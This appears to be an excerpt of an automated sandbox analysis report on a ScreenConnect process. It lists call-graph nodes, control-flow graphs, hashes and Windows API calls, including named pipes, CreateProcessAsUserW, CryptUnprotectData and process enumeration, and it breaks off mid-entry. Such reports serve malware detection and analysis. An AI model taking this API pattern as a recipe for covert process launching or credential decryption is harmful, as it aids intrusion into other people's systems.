37711 1376f00 2 API calls 37709->37711 37712 1376f69 2 API calls 37709->37712 37710->37675 37711->37710 37712->37710 37714 3c0005f 37713->37714 37716 3c00510 2 API calls 37714->37716 37823 3c00502 37714->37823 37715 3c000d1 37715->37675 37716->37715 37720 1376f00 2 API calls 37718->37720 37721 1376f69 2 API calls 37718->37721 37719 5357744 37719->37675 37720->37719 37721->37719 37723 53577d2 37722->37723 37724 5357808 37723->37724 37725 5357720 2 API calls 37723->37725 37724->37675 37725->37724 37727 3c0005f 37726->37727 37729 3c00510 2 API calls 37727->37729 37730 3c00502 2 API calls 37727->37730 37728 3c000d1 37728->37675 37729->37728 37730->37728 37732 137a4f9 37731->37732 37733 137a4ed 37731->37733 37732->37733 37734 3c048a0 2 API calls 37732->37734 37735 3c048b0 2 API calls 37732->37735 37733->37685 37734->37733 37735->37733 37737 137a4f9 37736->37737 37738 137a4ed 37736->37738 37737->37738 37739 3c048a0 2 API calls 37737->37739 37740 3c048b0 2 API calls 37737->37740 37738->37685 37739->37738 37740->37738 37743 3c048e4 37741->37743 37744 3c048d4 37741->37744 37742 3c048dd 37742->37685 37746 137f930 2 API calls 37743->37746 37744->37742 37765 3c066f0 37744->37765 37746->37744 37749 3c048d4 37747->37749 37750 3c048e4 37747->37750 37748 3c048dd 37748->37685 37749->37748 37751 3c066f0 2 API calls 37749->37751 37752 137f930 2 API calls 37750->37752 37751->37748 37752->37749 37754 53576e6 37753->37754 37755 53576a3 37753->37755 37754->37685 37804 1376f00 37755->37804 37810 1376f69 37755->37810 37756 53576c4 37756->37685 37760 5356e4a 37759->37760 37760->37759 37761 5356f22 37760->37761 37763 1376f00 2 API calls 37760->37763 37764 1376f69 2 API calls 37760->37764 37761->37685 37762 53576c4 37762->37685 37763->37762 37764->37762 37766 3c06730 37765->37766 37769 3c00510 37766->37769 37768 3c0674b 37768->37742 37770 3c00536 37769->37770 37773 53510d7 37769->37773 37777 53510d8 37769->37777 37770->37768 37774 53510ea 37773->37774 37775 535110d 37774->37775 37781 5351127 
37774->37781 37775->37770 37778 53510ea 37777->37778 37779 535110d 37778->37779 37780 5351127 2 API calls 37778->37780 37779->37770 37780->37779 37782 5351140 37781->37782 37786 5351339 37782->37786 37795 5351348 37782->37795 37783 5351180 37783->37775 37787 535136f 37786->37787 37788 535145a CreateNamedPipeW 37787->37788 37789 53513f0 37787->37789 37792 5351521 37788->37792 37793 5351339 CreateNamedPipeW 37789->37793 37794 5351348 CreateNamedPipeW 37789->37794 37790 5351450 37790->37783 37792->37783 37793->37790 37794->37790 37796 535136f 37795->37796 37797 53513f0 37796->37797 37798 535145a CreateNamedPipeW 37796->37798 37802 5351339 CreateNamedPipeW 37797->37802 37803 5351348 CreateNamedPipeW 37797->37803 37801 5351521 37798->37801 37799 5351450 37799->37783 37801->37783 37802->37799 37803->37799 37805 1376f0f 37804->37805 37806 1376f17 37804->37806 37805->37756 37815 1377481 37806->37815 37819 1377490 37806->37819 37807 1376ff5 37807->37756 37811 1376f9c 37810->37811 37813 1377481 2 API calls 37811->37813 37814 1377490 2 API calls 37811->37814 37812 1376ff5 37812->37756 37813->37812 37814->37812 37816 13774ba 37815->37816 37817 13774d5 37816->37817 37818 137f930 2 API calls 37816->37818 37817->37807 37818->37817 37820 13774ba 37819->37820 37821 13774d5 37820->37821 37822 137f930 2 API calls 37820->37822 37821->37807 37822->37821 37824 3c00536 37823->37824 37825 53510d7 2 API calls 37823->37825 37826 53510d8 2 API calls 37823->37826 37824->37715 37825->37824 37826->37824 37827 5356130 37828 5356142 37827->37828 37831 5356620 37828->37831 37832 5356655 37831->37832 37835 5356736 37832->37835 37839 53567d0 37835->37839 37844 5356800 37835->37844 37836 53566a3 37840 535680d 37839->37840 37842 1377481 2 API calls 37840->37842 37843 1377490 2 API calls 37840->37843 37841 5356904 37841->37836 37842->37841 37843->37841 37845 535680d 37844->37845 37847 1377481 2 API calls 37845->37847 37848 1377490 2 API calls 37845->37848 37846 5356904 37846->37836 37847->37846 
37848->37846 37997 5350270 37998 53502c3 CreateProcessAsUserW 37997->37998 38000 5350354 37998->38000 38001 53520f0 38002 535210e 38001->38002 38004 5352127 38002->38004 38007 5352240 38002->38007 38006 5352240 CreateFileA 38006->38004 38008 535225d 38007->38008 38012 5355f10 38008->38012 38016 5355f0c 38008->38016 38013 5355f23 38012->38013 38020 53554a4 38013->38020 38017 5355f23 38016->38017 38018 53554a4 CreateFileA 38017->38018 38019 5352150 38018->38019 38019->38006 38022 5355f60 CreateFileA 38020->38022 38023 5356095 38022->38023 38024 5351ed0 38025 5351f24 ConnectNamedPipe 38024->38025 38026 5351f60 38025->38026 37849 13736b0 37854 13736c6 37849->37854 37850 1373764 37851 1373739 37853 13736f9 37853->37850 37861 137e5dc 37853->37861 37854->37850 37854->37853 37856 137a6b0 37854->37856 37857 137a6ef 37856->37857 37868 137b987 37857->37868 37872 137b998 37857->37872 37858 137a756 37858->37853 37862 137e614 37861->37862 37865 137e7e6 37861->37865 37863 137e62e 37862->37863 37882 137ea99 37862->37882 37886 137eaa8 37862->37886 37864 137b398 2 API calls 37863->37864 37863->37865 37864->37865 37865->37851 37869 137b9ac 37868->37869 37876 137b398 37869->37876 37871 137b9c5 37871->37858 37873 137b9ac 37872->37873 37874 137b398 2 API calls 37873->37874 37875 137b9c5 37874->37875 37875->37858 37877 137b3af 37876->37877 37878 1376f00 2 API calls 37877->37878 37879 137b3cc 37878->37879 37880 1376f00 2 API calls 37879->37880 37881 137b3de 37880->37881 37881->37871 37884 137eace 37882->37884 37883 137eb06 37883->37863 37884->37883 37890 137eb50 37884->37890 37888 137eace 37886->37888 37887 137eb06 37887->37863 37888->37887 37889 137eb50 2 API calls 37888->37889 37889->37887 37891 137eb8e 37890->37891 37897 137f788 37891->37897 37892 137ee2f 37893 137edb7 37893->37892 37901 3c009f8 37893->37901 37906 3c00a08 37893->37906 37898 137f7b3 37897->37898 37899 137f7ac 37897->37899 37898->37893 37899->37898 37900 137f930 2 API calls 37899->37900 37900->37898 37902 3c00a07 
37901->37902 37903 3c009be 37901->37903 37904 3c00510 2 API calls 37902->37904 37903->37893 37905 3c00a45 37904->37905 37905->37893 37907 3c00a2d 37906->37907 37908 3c00510 2 API calls 37907->37908 37909 3c00a45 37908->37909 37909->37893 38027 1376d50 38028 1376d7b 38027->38028 38029 1376d74 38027->38029 38029->38028 38030 1376f00 2 API calls 38029->38030 38031 1376f69 2 API calls 38029->38031 38030->38028 38031->38028 38032 3c05f28 38033 3c05f4c 38032->38033 38034 3c05f5c 38032->38034 38035 3c05f55 38033->38035 38040 3c06558 2 API calls 38033->38040 38041 3c0648a 2 API calls 38033->38041 38042 3c0643b 2 API calls 38033->38042 38043 3c064df 2 API calls 38033->38043 38044 3c06558 38034->38044 38050 3c0648a 38034->38050 38056 3c064df 38034->38056 38062 3c0643b 38034->38062 38040->38033 38041->38033 38042->38033 38043->38033 38046 3c0658b 38044->38046 38047 3c0657b 38044->38047 38045 3c06584 38045->38033 38049 137f930 2 API calls 38046->38049 38047->38045 38048 137f930 2 API calls 38047->38048 38048->38047 38049->38047 38051 3c06454 38050->38051 38053 3c0657b 38051->38053 38055 137f930 2 API calls 38051->38055 38052 3c06584 38052->38033 38053->38052 38054 137f930 2 API calls 38053->38054 38054->38053 38055->38053 38058 3c06566 38056->38058 38057 3c06584 38057->38033 38059 3c0657b 38058->38059 38061 137f930 2 API calls 38058->38061 38059->38057 38060 137f930 2 API calls 38059->38060 38060->38059 38061->38059 38063 3c06454 38062->38063 38065 3c0657b 38063->38065 38067 137f930 2 API calls 38063->38067 38064 3c06584 38064->38033 38065->38064 38066 137f930 2 API calls 38065->38066 38066->38065 38067->38065 38068 3c005aa 38069 3c00572 38068->38069 38071 3c005b3 38068->38071 38073 3c067df 2 API calls 38069->38073 38074 3c06860 38069->38074 38070 3c0057a 38073->38070 38076 3c06886 38074->38076 38075 3c068fb 38075->38070 38076->38075 38077 3c06998 2 API calls 38076->38077 38077->38075 37918 58460a8 37920 58460dc 37918->37920 37921 58460cc 37918->37921 37919 58460d5 37926 
5846218 37920->37926 37933 5846228 37920->37933 37921->37919 37924 5846218 4 API calls 37921->37924 37925 5846228 4 API calls 37921->37925 37924->37921 37925->37921 37927 584624d 37926->37927 37929 584625d 37926->37929 37928 5846256 37927->37928 37954 5845628 37927->37954 37928->37921 37940 5846398 37929->37940 37947 58463a8 37929->37947 37934 584624d 37933->37934 37936 584625d 37933->37936 37935 5846256 37934->37935 37937 5845628 ProcessIdToSessionId 37934->37937 37935->37921 37938 5846398 2 API calls 37936->37938 37939 58463a8 2 API calls 37936->37939 37937->37934 37938->37934 37939->37934 37945 58463d2 37940->37945 37946 58463bf 37940->37946 37941 58463c8 37941->37927 37942 584653a K32EnumProcesses 37943 5846572 37942->37943 37943->37927 37945->37946 37957 5845634 37945->37957 37946->37941 37946->37942 37952 58463d2 37947->37952 37953 58463bf 37947->37953 37948 58463c8 37948->37927 37949 584653a K32EnumProcesses 37950 5846572 37949->37950 37950->37927 37951 5845634 K32EnumProcesses 37951->37952 37952->37951 37952->37953 37953->37948 37953->37949 37955 58465e0 ProcessIdToSessionId 37954->37955 37956 5846653 37955->37956 37956->37927 37958 58464e8 K32EnumProcesses 37957->37958 37960 5846572 37958->37960 37960->37945 37910 53522b8 37911 5352300 WaitNamedPipeW 37910->37911 37912 53522fa 37910->37912 37913 5352334 37911->37913 37912->37911 37914 5350d24 37915 53508b8 37914->37915 37916 5350945 37915->37916 37917 3c066f0 2 API calls 37915->37917 37917->37916 37961 3c06773 37962 3c0678b 37961->37962 37964 3c067df 37961->37964 37965 3c067c1 37964->37965 37967 3c067ff 37964->37967 37965->37962 37966 3c068fb 37966->37962 37967->37966 37969 3c06998 37967->37969 37970 3c069c8 37969->37970 37972 3c06ac2 37970->37972 37974 3c069dc 37970->37974 37971 3c06b38 37971->37966 37972->37971 37973 3c02970 2 API calls 37972->37973 37975 3c06b26 37973->37975 37978 3c06b42 37974->37978 37979 3c02970 37974->37979 37975->37966 37978->37966 37980 3c02996 37979->37980 37982 137fab8 2 API 
calls 37980->37982 37981 3c029a2 37982->37981 37983 5352d81 37984 5352d43 37983->37984 37985 5352d8f 37983->37985 37986 5352de6 37985->37986 37988 53531f8 37985->37988 37989 5353207 37988->37989 37990 53531bb 37988->37990 37989->37990 37991 1377481 2 API calls 37989->37991 37992 1377490 2 API calls 37989->37992 37990->37986 37991->37989 37992->37989 37993 3c016f8 37994 3c01740 CryptProtectData 37993->37994 37995 3c0173a 37993->37995 37996 3c01783 37994->37996 37995->37994

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 63 5351348-53513ce 72 53513d0-53513d2 63->72 73 53513d9-53513e5 63->73 72->73 75 53513e7-53513ee 73->75 76 53513f0-53513f2 73->76 75->76 77 53513f4-53513fb 75->77 78 5351400-5351428 76->78 79 53513fd 77->79 80 535145a-53514b2 77->80 82 5351431 78->82 83 535142a-535142f 78->83 79->78 86 53514b4-53514b7 80->86 87 53514ba-535151f CreateNamedPipeW 80->87 85 5351436-535144a 82->85 83->85 94 535144b call 5351339 85->94 95 535144b call 5351348 85->95 86->87 90 5351521-5351527 87->90 91 5351528-5351549 87->91 88 5351450-5351457 90->91 94->88 95->88
                                                                                    APIs
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 0535150C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID: 4L^q$d/dq
                                                                                    • API String ID: 2489174969-3455392024
                                                                                    • Opcode ID: 33dc75595054f0c85bd2dd2395972e93d38fb1d2ef3c1748797343613989da1d
                                                                                    • Instruction ID: 3b422db7e7b82d4857cca818e6d36e45a98786788d7a5768e7cf499cb5a5196c
                                                                                    • Opcode Fuzzy Hash: 33dc75595054f0c85bd2dd2395972e93d38fb1d2ef3c1748797343613989da1d
                                                                                    • Instruction Fuzzy Hash: 9161B170A003089FCB10CFA9D844B9EBFF6FF88310F14C06AE909AB291D7759905CBA1
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0535033F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 0a8271b4ff750ff8d483619c767137d1620324b245395c354b58e3a8adfb1bb2
                                                                                    • Instruction ID: 82da59a116e07765bd51afcc7a687f1303c0cd39f56067839ba25530be397ec6
                                                                                    • Opcode Fuzzy Hash: 0a8271b4ff750ff8d483619c767137d1620324b245395c354b58e3a8adfb1bb2
                                                                                    • Instruction Fuzzy Hash: 4B413476900209DFCF10CFA9C884ADEBBF5FF48320F14842AE918A7260D775A955CF90
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0584305D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 36700785f3ef7d283025f1665f04ba1a3467e04cc12a5c083f158f45d525a6b1
                                                                                    • Instruction ID: 67ecde1cf521e863416c03f2e9d21e9ce1004d6db7c56a7db88a3718c3181494
                                                                                    • Opcode Fuzzy Hash: 36700785f3ef7d283025f1665f04ba1a3467e04cc12a5c083f158f45d525a6b1
                                                                                    • Instruction Fuzzy Hash: 3031FF728083898FCB11CFA8C8406DEBFF0EF49314F15809AD894A7262C3349845CFA5
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03C0176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2970487585.0000000003C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_3c00000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: c278c7c9536da578daec2f996f9e55cd5f5ca98b463bffbf3eed495d27cc388b
                                                                                    • Instruction ID: 39dbab0059c66b4dc37c17c2dee9fe7151de62cf3b739a9340885165c2160d60
                                                                                    • Opcode Fuzzy Hash: c278c7c9536da578daec2f996f9e55cd5f5ca98b463bffbf3eed495d27cc388b
                                                                                    • Instruction Fuzzy Hash: C32114B6800249DFCB10CF9AC844ADEFBB1FB88310F18852AE959A7250C335A555CFA1
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03C0176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2970487585.0000000003C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_3c00000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: b29449516449ef1c0e38d940977db5c0701f84fad7fe7360f3c8282b8f4da100
                                                                                    • Instruction ID: b0bcf2fd6981c2f01ed6e5461f90839319356045d441a94517ab668e4f8380a9
                                                                                    • Opcode Fuzzy Hash: b29449516449ef1c0e38d940977db5c0701f84fad7fe7360f3c8282b8f4da100
                                                                                    • Instruction Fuzzy Hash: 552107B68002499FCB10CF9AC844ADEFBF5FB48350F14841AE918A7250C335A555CFA5
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0584305D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 455ee9317492eef440a640b5f9c68b4b2bd9c2f519d400aaf7498b88979a3c4e
                                                                                    • Instruction ID: 771a20ef0068ba6187f7f39c7e33fd288f9dec50ff90f9de0b4950b296cfbf25
                                                                                    • Opcode Fuzzy Hash: 455ee9317492eef440a640b5f9c68b4b2bd9c2f519d400aaf7498b88979a3c4e
                                                                                    • Instruction Fuzzy Hash: 3521477680020DDFCF10CF99C844BEEBBF5EB48320F108459EA28A7251C739A995DFA5
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0584305D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 8fafe771064d4d969b9819507008d3b6a0b74e26a51b14df84221cbfcdf85cad
                                                                                    • Instruction ID: a0eec511650405d5c9a06b46fff552e73ac8da01baf5d30701dbf2fea5baf594
                                                                                    • Opcode Fuzzy Hash: 8fafe771064d4d969b9819507008d3b6a0b74e26a51b14df84221cbfcdf85cad
                                                                                    • Instruction Fuzzy Hash: 542147B6800209DFCF10CF99C845BEEBBF5EB48320F148419E928A7211C339A995CFA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 96 5355f54-5355fbc 97 5356010-5356093 CreateFileA 96->97 98 5355fbe-5355fe3 96->98 105 5356095-535609b 97->105 106 535609c-53560da 97->106 98->97 101 5355fe5-5355fe7 98->101 103 5355fe9-5355ff3 101->103 104 535600a-535600d 101->104 107 5355ff5 103->107 108 5355ff7-5356006 103->108 104->97 105->106 113 53560dc-53560e0 106->113 114 53560ea 106->114 107->108 108->108 109 5356008 108->109 109->104 113->114 115 53560e2 113->115 116 53560eb 114->116 115->114 116->116
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0535607D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4L^q
                                                                                    • API String ID: 823142352-616035646
                                                                                    • Opcode ID: 3524bdbdc4c9b26f6d2de499d1e7906f0d18603ac56355a24a692ad8c92ba6a6
                                                                                    • Instruction ID: 47bb84bf55b4c8acfaa05e2b170315dfbef0aa3a6c8a7dad92eec42f7327b74d
                                                                                    • Opcode Fuzzy Hash: 3524bdbdc4c9b26f6d2de499d1e7906f0d18603ac56355a24a692ad8c92ba6a6
                                                                                    • Instruction Fuzzy Hash: B35167B1D002589FDB10CFA9C885B9EBBF1FB48314F248129E819EB261D7B59845CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 117 53554a4-5355fbc 119 5356010-5356093 CreateFileA 117->119 120 5355fbe-5355fe3 117->120 127 5356095-535609b 119->127 128 535609c-53560da 119->128 120->119 123 5355fe5-5355fe7 120->123 125 5355fe9-5355ff3 123->125 126 535600a-535600d 123->126 129 5355ff5 125->129 130 5355ff7-5356006 125->130 126->119 127->128 135 53560dc-53560e0 128->135 136 53560ea 128->136 129->130 130->130 131 5356008 130->131 131->126 135->136 137 53560e2 135->137 138 53560eb 136->138 137->136 138->138
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0535607D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4L^q
                                                                                    • API String ID: 823142352-616035646
                                                                                    • Opcode ID: 1b52e4be0733e0375e83b7a6af7d1c4b551bbe182d71d2a5bdfd5eccf254320b
                                                                                    • Instruction ID: 32df2e660fd81cd193425268f8b4976c14a4593e96720db4152f21c404e5c5cc
                                                                                    • Opcode Fuzzy Hash: 1b52e4be0733e0375e83b7a6af7d1c4b551bbe182d71d2a5bdfd5eccf254320b
                                                                                    • Instruction Fuzzy Hash: 555165B0D04258DFDB10CFA9C845B9EBBF2FB48314F248029E808AB365D7B59845CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    [control-flow graph omitted: rendered graph data not recoverable as text; API node: K32EnumProcesses]
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0131ffb3475387b56d214fc6736ba80e188fa2cb37559fbe641148dca5e1a3f
                                                                                    • Instruction ID: f08d4215ad2a1d83bb8e5837aa79d7420776ea017a7550830d38ada7696219ec
                                                                                    • Opcode Fuzzy Hash: d0131ffb3475387b56d214fc6736ba80e188fa2cb37559fbe641148dca5e1a3f
                                                                                    • Instruction Fuzzy Hash: 1D515171A007098FCB24CF6AD8846AEBBF5FB88310F14892ED85AD7651D734E945CF51
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0535033F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 1703805000d4228f7fd8987595c10edc77cf37a9f47e9e804afdac248063dfb2
                                                                                    • Instruction ID: 4df1712e95675c0271cd71e4e5aabfc7f46cb2b078dddf67aa504aeeeaec5003
                                                                                    • Opcode Fuzzy Hash: 1703805000d4228f7fd8987595c10edc77cf37a9f47e9e804afdac248063dfb2
                                                                                    • Instruction Fuzzy Hash: 6D413676900249DFCF11CFA9C884ADEBBF1FF48320F14852AE958A7260D375A955CF90
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0584663E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: 113f76e25c32d66bdaac6d0bf72bfa6395983df4b6cfa68de8761c75533fd66a
                                                                                    • Instruction ID: 1145cd858f4eaf10c7a166a310ea5b23484175976fa628e9c936567b5da85a85
                                                                                    • Opcode Fuzzy Hash: 113f76e25c32d66bdaac6d0bf72bfa6395983df4b6cfa68de8761c75533fd66a
                                                                                    • Instruction Fuzzy Hash: 9F2140B28003498FCB10CFAAC84479EBBF4FB48324F10802ED868A7251D338A945CFA5
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05351F48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: f3329d97490fb2acb30ceacef990014be88bdec9de6b4096d653b423b9c2cd07
                                                                                    • Instruction ID: b36955f40efc3bc9112b1a47730e29942410be925564d19a16deac971fc8a426
                                                                                    • Opcode Fuzzy Hash: f3329d97490fb2acb30ceacef990014be88bdec9de6b4096d653b423b9c2cd07
                                                                                    • Instruction Fuzzy Hash: 482125B0D042589FCB14CFAAD584BDEBBF4AF48310F148069E859AB350DB749945CFA5
                                                                                    APIs
                                                                                    • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0584655D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumProcesses
                                                                                    • String ID:
                                                                                    • API String ID: 84517404-0
                                                                                    • Opcode ID: 5b5b4bad320e8d2e578001e9e5e4d01aba7d49bc0c3a3b725890c90e833a5f26
                                                                                    • Instruction ID: 39675fb2bc4b1c2e911a96e7faeca4695db3562ee0aa256ff7a6f9a899702fae
                                                                                    • Opcode Fuzzy Hash: 5b5b4bad320e8d2e578001e9e5e4d01aba7d49bc0c3a3b725890c90e833a5f26
                                                                                    • Instruction Fuzzy Hash: 892128B1D002499FDB10CF9AC844AEEFBF4FB49324F10842EE919A7201D3789945CFA5
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05351F48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: daecae154dd73700640b40fbc05f2ff44faf8728de478baa5a16989a47a336dd
                                                                                    • Instruction ID: 7a705b7a10a13e322788d3eb8446bf2aba836818877f3a652ae6dcba7751d6a7
                                                                                    • Opcode Fuzzy Hash: daecae154dd73700640b40fbc05f2ff44faf8728de478baa5a16989a47a336dd
                                                                                    • Instruction Fuzzy Hash: F92113B0D042589FCB24CFAAC584B9EBBF5AF48310F14806AE849AB350CB749845CFA4
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 0535231F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    • Opcode ID: bb7a5fe0a320dae0375d5c09f776d02a94c7ee2f736c859d95da32d010e8277c
                                                                                    • Instruction ID: 5c75faee17a141c37a595b2a8edc773291e8921cba400018bf452159ba7a69c0
                                                                                    • Opcode Fuzzy Hash: bb7a5fe0a320dae0375d5c09f776d02a94c7ee2f736c859d95da32d010e8277c
                                                                                    • Instruction Fuzzy Hash: 482124B68002498FCB10CF9AC584BDEBBF4FF48320F14846ED969AB241C779A545CFA1
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 0535231F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    • Opcode ID: 93fc62d331249bd03888fc6c4eb325a31d1ba17d3dd12d68c4eb134f2a34ed59
